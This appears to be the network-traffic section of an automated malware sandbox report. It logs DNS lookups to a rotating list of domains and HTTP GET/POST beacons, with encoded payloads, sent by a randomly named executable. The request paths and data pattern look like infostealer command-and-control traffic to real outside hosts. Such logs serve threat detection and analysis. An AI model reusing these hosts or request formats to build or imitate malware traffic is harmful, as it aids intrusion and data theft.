                                                  Jul 2, 2024 14:09:35.744688988 CEST4977080192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:36.600864887 CEST4977080192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:37.619304895 CEST4977180192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:37.624985933 CEST804977135.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:37.625422001 CEST4977180192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:37.630925894 CEST4977180192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:37.636215925 CEST804977135.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:38.293370962 CEST804977135.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:38.293581009 CEST804977135.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:38.293675900 CEST4977180192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:39.132154942 CEST4977180192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:40.150614023 CEST4977280192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:40.156229973 CEST804977235.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:40.156900883 CEST4977280192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:40.160938978 CEST4977280192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:40.166359901 CEST804977235.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:40.166378975 CEST804977235.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:40.166434050 CEST804977235.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:40.166476011 CEST804977235.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:40.166503906 CEST804977235.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:40.166882992 CEST804977235.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:40.166946888 CEST804977235.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:40.166953087 CEST804977235.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:40.166965008 CEST804977235.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:40.828658104 CEST804977235.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:40.832053900 CEST804977235.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:40.832108974 CEST4977280192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:40.832199097 CEST804977235.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:40.832246065 CEST4977280192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:41.663372993 CEST4977280192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:42.684665918 CEST4977380192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:42.689795971 CEST804977335.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:42.689877033 CEST4977380192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:42.692312002 CEST4977380192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:42.697130919 CEST804977335.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:43.345776081 CEST804977335.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:43.349478006 CEST804977335.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:43.349502087 CEST804977335.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:43.349514008 CEST804977335.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:43.354840994 CEST4977380192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:43.356182098 CEST804977335.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:43.356199026 CEST804977335.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:43.356211901 CEST804977335.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:43.356601954 CEST804977335.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:43.356646061 CEST4977380192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:43.361463070 CEST4977380192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:43.361463070 CEST4977380192.168.2.435.186.221.100
                                                  Jul 2, 2024 14:09:43.370112896 CEST804977335.186.221.100192.168.2.4
                                                  Jul 2, 2024 14:09:48.399287939 CEST4977480192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:48.404266119 CEST804977446.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:48.404351950 CEST4977480192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:48.406343937 CEST4977480192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:48.411314964 CEST804977446.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:49.039344072 CEST804977446.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:49.039567947 CEST804977446.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:49.039612055 CEST4977480192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:49.916810989 CEST4977480192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:50.932601929 CEST4977580192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:50.937911987 CEST804977546.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:50.937983990 CEST4977580192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:50.940359116 CEST4977580192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:50.945265055 CEST804977546.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:51.598968983 CEST804977546.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:51.599088907 CEST804977546.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:51.600831032 CEST4977580192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:52.445102930 CEST4977580192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:53.595565081 CEST4977680192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:53.600603104 CEST804977646.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:53.600867987 CEST4977680192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:53.612956047 CEST4977680192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:53.618902922 CEST804977646.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:53.618937016 CEST804977646.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:53.618966103 CEST804977646.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:53.618993044 CEST804977646.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:53.619188070 CEST804977646.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:53.619398117 CEST804977646.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:53.619427919 CEST804977646.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:53.619456053 CEST804977646.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:53.619899035 CEST804977646.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:54.261322975 CEST804977646.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:54.261368036 CEST804977646.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:54.261593103 CEST4977680192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:55.116532087 CEST4977680192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:56.142801046 CEST4977780192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:56.147809029 CEST804977746.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:56.154140949 CEST4977780192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:56.161942005 CEST4977780192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:56.166784048 CEST804977746.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:56.790225029 CEST804977746.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:56.790425062 CEST804977746.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:56.790477037 CEST4977780192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:56.816683054 CEST4977780192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:56.821600914 CEST804977746.30.211.38192.168.2.4

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 2, 2024 14:06:41.074018955 CEST5538553192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:06:41.085146904 CEST53553851.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:06:46.114255905 CEST4934953192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:06:46.232656002 CEST53493491.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:07:01.823314905 CEST5404753192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:07:01.865825891 CEST53540471.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:07:15.041599989 CEST5275853192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:07:15.227447987 CEST53527581.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:07:28.588231087 CEST5368553192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:07:28.604546070 CEST53536851.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:07:42.010863066 CEST5521353192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:07:42.050860882 CEST53552131.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:07:55.354865074 CEST5743653192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:07:55.726633072 CEST53574361.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:08:31.260931015 CEST6129953192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:08:31.329518080 CEST53612991.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:08:49.697751045 CEST4989853192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:08:49.709032059 CEST53498981.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:08:57.775718927 CEST6024453192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:08:58.043137074 CEST53602441.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:09:12.136303902 CEST6019353192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:09:12.273114920 CEST53601931.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:09:25.776540995 CEST5151753192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:09:25.787246943 CEST53515171.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:09:34.354898930 CEST5006853192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:09:34.847973108 CEST53500681.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:09:48.369982004 CEST5974553192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:09:48.396364927 CEST53597451.1.1.1192.168.2.4
                                                  Jul 2, 2024 14:10:02.322925091 CEST6180553192.168.2.41.1.1.1
                                                  Jul 2, 2024 14:10:02.336436033 CEST53618051.1.1.1192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jul 2, 2024 14:06:41.074018955 CEST192.168.2.41.1.1.10xe872Standard query (0)www.miningarea.funA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:06:46.114255905 CEST192.168.2.41.1.1.10x7d3aStandard query (0)www.kosherphonestore.comA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:07:01.823314905 CEST192.168.2.41.1.1.10xf4edStandard query (0)www.abc8web.comA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:07:15.041599989 CEST192.168.2.41.1.1.10xb3b1Standard query (0)www.threendresses.comA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:07:28.588231087 CEST192.168.2.41.1.1.10x4f70Standard query (0)www.personalcaresale.shopA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:07:42.010863066 CEST192.168.2.41.1.1.10x9a33Standard query (0)www.coinwab.comA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:07:55.354865074 CEST192.168.2.41.1.1.10x4cb8Standard query (0)www.mqmsqkw.lolA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:08:31.260931015 CEST192.168.2.41.1.1.10xe521Standard query (0)www.synergon.spaceA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:08:49.697751045 CEST192.168.2.41.1.1.10xc626Standard query (0)www.wepayassessments.comA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:08:57.775718927 CEST192.168.2.41.1.1.10xc62Standard query (0)www.adoby.xyzA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:09:12.136303902 CEST192.168.2.41.1.1.10x2979Standard query (0)www.washio.worldA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:09:25.776540995 CEST192.168.2.41.1.1.10x5183Standard query (0)www.com-kh.comA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:09:34.354898930 CEST192.168.2.41.1.1.10xbdcdStandard query (0)www.6666111p.vipA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:09:48.369982004 CEST192.168.2.41.1.1.10x9d1cStandard query (0)www.0araba.netA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:10:02.322925091 CEST192.168.2.41.1.1.10xd08Standard query (0)www.rtrpodcast.onlineA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jul 2, 2024 14:06:41.085146904 CEST1.1.1.1192.168.2.40xe872Name error (3)www.miningarea.funnonenoneA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:06:46.232656002 CEST1.1.1.1192.168.2.40x7d3aNo error (0)www.kosherphonestore.comwww.kosherphonestore.com.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                                                  Jul 2, 2024 14:06:46.232656002 CEST1.1.1.1192.168.2.40x7d3aNo error (0)www.kosherphonestore.com.cdn.hstgr.net84.32.84.112A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:07:01.865825891 CEST1.1.1.1192.168.2.40xf4edNo error (0)www.abc8web.comabc8web.comCNAME (Canonical name)IN (0x0001)false
                                                  Jul 2, 2024 14:07:01.865825891 CEST1.1.1.1192.168.2.40xf4edNo error (0)abc8web.com3.33.130.190A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:07:01.865825891 CEST1.1.1.1192.168.2.40xf4edNo error (0)abc8web.com15.197.148.33A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:07:15.227447987 CEST1.1.1.1192.168.2.40xb3b1No error (0)www.threendresses.comthreendresses.comCNAME (Canonical name)IN (0x0001)false
                                                  Jul 2, 2024 14:07:15.227447987 CEST1.1.1.1192.168.2.40xb3b1No error (0)threendresses.com78.111.111.51A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:07:28.604546070 CEST1.1.1.1192.168.2.40x4f70No error (0)www.personalcaresale.shop172.67.200.242A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:07:28.604546070 CEST1.1.1.1192.168.2.40x4f70No error (0)www.personalcaresale.shop104.21.21.230A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:07:42.050860882 CEST1.1.1.1192.168.2.40x9a33No error (0)www.coinwab.com188.114.97.3A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:07:42.050860882 CEST1.1.1.1192.168.2.40x9a33No error (0)www.coinwab.com188.114.96.3A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:07:55.726633072 CEST1.1.1.1192.168.2.40x4cb8No error (0)www.mqmsqkw.lol116.213.43.190A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:08:31.329518080 CEST1.1.1.1192.168.2.40xe521No error (0)www.synergon.spacesynergon.spaceCNAME (Canonical name)IN (0x0001)false
                                                  Jul 2, 2024 14:08:31.329518080 CEST1.1.1.1192.168.2.40xe521No error (0)synergon.space109.95.158.127A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:08:49.709032059 CEST1.1.1.1192.168.2.40xc626Name error (3)www.wepayassessments.comnonenoneA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:08:58.043137074 CEST1.1.1.1192.168.2.40xc62No error (0)www.adoby.xyz162.0.213.72A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:09:12.273114920 CEST1.1.1.1192.168.2.40x2979No error (0)www.washio.world194.58.112.174A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:09:25.787246943 CEST1.1.1.1192.168.2.40x5183Name error (3)www.com-kh.comnonenoneA (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:09:34.847973108 CEST1.1.1.1192.168.2.40xbdcdNo error (0)www.6666111p.vip35.186.221.100A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:09:48.396364927 CEST1.1.1.1192.168.2.40x9d1cNo error (0)www.0araba.net46.30.211.38A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:10:02.336436033 CEST1.1.1.1192.168.2.40xd08No error (0)www.rtrpodcast.onlinertrpodcast.onlineCNAME (Canonical name)IN (0x0001)false
                                                  Jul 2, 2024 14:10:02.336436033 CEST1.1.1.1192.168.2.40xd08No error (0)rtrpodcast.online76.223.67.189A (IP address)IN (0x0001)false
                                                  Jul 2, 2024 14:10:02.336436033 CEST1.1.1.1192.168.2.40xd08No error (0)rtrpodcast.online13.248.213.45A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • www.kosherphonestore.com
                                                  • www.abc8web.com
                                                  • www.threendresses.com
                                                  • www.personalcaresale.shop
                                                  • www.coinwab.com
                                                  • www.mqmsqkw.lol
                                                  • www.synergon.space
                                                  • www.adoby.xyz
                                                  • www.washio.world
                                                  • www.6666111p.vip
                                                  • www.0araba.net

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.44973684.32.84.112801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:06:46.303030968 CEST507OUTGET /y0az/?wd98XJp=1StTTN5BD+5aXW5ltMxXpzm1HVVSwZLsUdxETJpeMbRSKeJkL8yNVC6cqVCEcPMcPzsub+RoFiososJ7aYXNlWIy6nA9AoQ6GnR0Gmd+weA/r+qlKoAho/M=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.kosherphonestore.com
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:06:46.773809910 CEST1236INHTTP/1.1 301 Moved Permanently
                                                  Server: hcdn
                                                  Date: Tue, 02 Jul 2024 12:06:46 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 795
                                                  Connection: close
                                                  location: https://www.kosherphonestore.com/y0az/?wd98XJp=1StTTN5BD+5aXW5ltMxXpzm1HVVSwZLsUdxETJpeMbRSKeJkL8yNVC6cqVCEcPMcPzsub+RoFiososJ7aYXNlWIy6nA9AoQ6GnR0Gmd+weA/r+qlKoAho/M=&2hZdq=H6f4R
                                                  platform: hostinger
                                                  content-security-policy: upgrade-insecure-requests
                                                  alt-svc: h3=":443"; ma=86400
                                                  x-hcdn-request-id: e36698108510dbb971e6cba6148b6750-bos-edge3
                                                  x-hcdn-cache-status: MISS
                                                  x-hcdn-upstream-rt: 0.001
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20p
                                                  Jul 2, 2024 14:06:46.773828983 CEST120INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20
                                                  Data Ascii: x;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.4497383.33.130.190801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:07:01.922969103 CEST765OUTPOST /sm5e/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.abc8web.com
                                                  Origin: http://www.abc8web.com
                                                  Referer: http://www.abc8web.com/sm5e/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 6c 2b 5a 6d 35 36 4a 6c 6b 53 54 42 56 4a 76 30 56 36 4b 6b 41 4f 4b 4f 69 69 61 4e 55 6a 37 76 7a 31 75 33 4f 65 49 61 57 50 71 48 46 2f 69 67 2f 45 30 76 52 4c 4c 4e 77 6b 4b 34 6b 78 78 6e 56 36 35 61 53 38 59 76 6e 67 70 76 33 6e 37 6f 48 53 45 79 38 38 4e 2f 6f 74 54 6a 41 45 4d 37 47 2f 6f 34 33 4d 48 71 56 5a 4a 32 6b 38 61 4a 67 52 2b 4a 37 43 38 52 75 6c 72 43 36 56 4e 73 74 2f 75 33 51 70 54 69 67 42 71 61 51 43 46 39 55 66 67 69 36 55 51 31 2b 2f 34 39 63 59 35 37 43 4c 38 47 33 66 51 62 6f 6a 73 51 6d 65 64 70 7a 47 7a 61 6d 6e 52 37 74 51 34 34 71 53 57 59 49 67 3d 3d
                                                  Data Ascii: wd98XJp=l+Zm56JlkSTBVJv0V6KkAOKOiiaNUj7vz1u3OeIaWPqHF/ig/E0vRLLNwkK4kxxnV65aS8Yvngpv3n7oHSEy88N/otTjAEM7G/o43MHqVZJ2k8aJgR+J7C8RulrC6VNst/u3QpTigBqaQCF9Ufgi6UQ1+/49cY57CL8G3fQbojsQmedpzGzamnR7tQ44qSWYIg==


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.4497393.33.130.190801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:07:04.478291988 CEST785OUTPOST /sm5e/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.abc8web.com
                                                  Origin: http://www.abc8web.com
                                                  Referer: http://www.abc8web.com/sm5e/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 6c 2b 5a 6d 35 36 4a 6c 6b 53 54 42 56 70 2f 30 53 5a 53 6b 49 4f 4b 50 76 79 61 4e 43 54 36 48 7a 31 79 33 4f 62 34 4b 57 36 79 48 46 64 36 67 74 46 30 76 57 4c 4c 4e 37 45 4b 78 35 68 78 6f 56 39 78 30 53 39 49 76 6e 67 39 76 33 6e 4c 6f 48 68 63 39 38 73 4e 35 38 64 54 68 4e 6b 4d 37 47 2f 6f 34 33 4e 6a 45 56 5a 42 32 6e 4d 4b 4a 68 30 4b 4b 34 43 38 53 70 6c 72 43 72 46 4e 67 74 2f 75 56 51 72 6e 63 67 45 75 61 51 43 31 39 61 72 55 74 31 55 51 73 78 66 35 70 4e 36 63 6f 4d 59 63 4b 35 59 34 71 67 54 64 32 75 34 4d 7a 69 33 53 4e 30 6e 31 49 77 58 78 4d 6e 52 72 52 54 6f 52 74 46 65 48 76 75 62 39 72 66 69 78 64 41 6a 50 44 48 33 6b 3d
                                                  Data Ascii: wd98XJp=l+Zm56JlkSTBVp/0SZSkIOKPvyaNCT6Hz1y3Ob4KW6yHFd6gtF0vWLLN7EKx5hxoV9x0S9Ivng9v3nLoHhc98sN58dThNkM7G/o43NjEVZB2nMKJh0KK4C8SplrCrFNgt/uVQrncgEuaQC19arUt1UQsxf5pN6coMYcK5Y4qgTd2u4Mzi3SN0n1IwXxMnRrRToRtFeHvub9rfixdAjPDH3k=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.4497403.33.130.190801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:07:07.017208099 CEST10867OUTPOST /sm5e/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.abc8web.com
                                                  Origin: http://www.abc8web.com
                                                  Referer: http://www.abc8web.com/sm5e/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
